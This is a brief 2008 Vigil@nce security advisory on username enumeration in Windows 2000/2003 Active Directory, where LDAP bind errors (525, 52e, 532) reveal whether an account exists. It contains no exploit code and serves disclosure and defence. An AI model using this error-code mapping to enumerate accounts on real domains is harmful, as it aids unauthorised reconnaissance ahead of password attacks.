Vigil@nce: Windows AD, user detection via LDAP
November 2008 by Vigil@nce
SYNTHESIS
An attacker can connect to the LDAP server to detect if user names
are valid.
Gravity: 1/4
Consequences: data reading
Provenance: intranet client
Means of attack: 1 attack
Ability of attacker: technician (2/4)
Confidence: multiples sources (3/5)
Diffusion of the vulnerable configuration: high (3/3)
Creation date: 18/11/2008
IMPACTED PRODUCTS
– Microsoft Windows 2000
– Microsoft Windows 2003
DESCRIPTION
The Windows Active Directory enables a LDAP server.
When an authentication error occurs on this LDAP server, the error
message depends on the user:
– 525 : user does not exist
– 52e : password is incorrect
– 532 : password has expired
– etc.
An attacker can therefore successively test a list of user names
in order to detect those who are in the domain.
CHARACTERISTICS
Identifiers: BID-32305, VIGILANCE-VUL-8256